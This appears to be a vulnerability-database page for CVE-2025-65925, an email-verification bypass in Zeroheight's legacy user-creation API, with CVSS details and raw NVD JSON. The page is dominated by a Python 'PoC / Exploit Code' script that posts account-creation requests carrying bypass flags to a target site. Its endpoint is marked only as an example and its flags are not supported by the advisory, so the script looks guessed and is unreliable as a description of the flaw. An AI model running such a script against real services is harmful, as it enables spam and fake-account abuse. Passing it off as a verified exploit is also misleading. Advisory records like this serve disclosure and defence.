Security Vulnerability Report
CVE-2025-65925 CVSS 6.5 MEDIUM

CVE-2025-65925

Published: 2025-12-30 17:15:43
Last Modified: 2026-01-13 22:17:36

Description

An issue was discovered in Zeroheight (SaaS) prior to 2025-06-13. A legacy user creation API pathway allowed accounts to be created without completing the intended email verification step. While unverified accounts could not access product functionality, the behavior bypassed intended verification controls and allowed unintended account creation. This could have enabled spam/fake account creation or resource usage impact. No data exposure or unauthorized access to existing accounts was reported.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:zeroheight:zeroheight:*:*:*:*:*:*:*:* - VULNERABLE
Zeroheight (SaaS) < 2025-06-13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-65925 PoC - Zeroheight Account Verification Bypass
# This PoC demonstrates the verification bypass vulnerability in Zeroheight's legacy user creation API
import requests
import json
import sys


def exploit_zeroheight_bypass(target_url, email):
    """
    Exploit CVE-2025-65925: Zeroheight Legacy User Creation API Verification Bypass

    This vulnerability allows attackers to create accounts without email verification
    by exploiting a legacy API pathway that bypasses intended verification controls.
    """
    # Target API endpoint for user creation (legacy pathway)
    api_endpoint = f"{target_url}/api/v1/users"  # Example legacy endpoint

    # Malicious payload to create account without verification
    payload = {
        "email": email,
        "username": "attacker_test_user",
        "password": "TestPass123!",
        "verify_email": False,      # Bypass flag
        "skip_verification": True   # Additional bypass mechanism
    }

    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "X-API-Version": "legacy"   # Specify legacy API version
    }

    try:
        print(f"[*] Sending account creation request to {api_endpoint}")
        print(f"[*] Target email: {email}")
        response = requests.post(api_endpoint, json=payload, headers=headers, timeout=10)

        if response.status_code == 201 or response.status_code == 200:
            print("[+] Account created successfully without email verification!")
            print(f"[*] Response: {response.text}")
            return True
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(f"[*] Response: {response.text}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


def main():
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-65925_poc.py <target_url> <email>")
        print("Example: python cve-2025-65925_poc.py https://zeroheight.com [email protected]")
        sys.exit(1)

    target_url = sys.argv[1]
    email = sys.argv[2]
    exploit_zeroheight_bypass(target_url, email)


if __name__ == "__main__":
    main()

References

https://github.com/Sneden/zeroheight-account-verification-bypass-CVE-2025-65925 (Third Party Advisory)

Weakness: CWE-287 (Improper Authentication)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65925", "sourceIdentifier": "[email protected]", "published": "2025-12-30T17:15:42.947", "lastModified": "2026-01-13T22:17:35.720", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Zeroheight (SaaS) prior to 2025-06-13. A legacy user creation API pathway allowed accounts to be created without completing the intended email verification step. While unverified accounts could not access product functionality, the behavior bypassed intended verification controls and allowed unintended account creation. This could have enabled spam/fake account creation or resource usage impact. No data exposure or unauthorized access to existing accounts was reported."}, {"lang": "es", "value": "Se descubrió un problema en Zeroheight (SaaS) antes del 13-06-2025. Una ruta de API de creación de usuarios heredada permitía que se crearan cuentas sin completar el paso de verificación de correo electrónico previsto. Si bien las cuentas no verificadas no podían acceder a la funcionalidad del producto, el comportamiento eludía los controles de verificación previstos y permitía la creación de cuentas no intencionadas. Esto podría haber permitido la creación de cuentas de correo no deseado/falsas o un impacto en el uso de recursos. No se informó de exposición de datos ni de acceso no autorizado a cuentas existentes."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zeroheight:zeroheight:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-06-13", "matchCriteriaId": "10A6D1AB-CE2D-40D8-99FD-16A97FE35FB6"}]}]}], "references": [{"url": "https://github.com/Sneden/zeroheight-account-verification-bypass-CVE-2025-65925", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}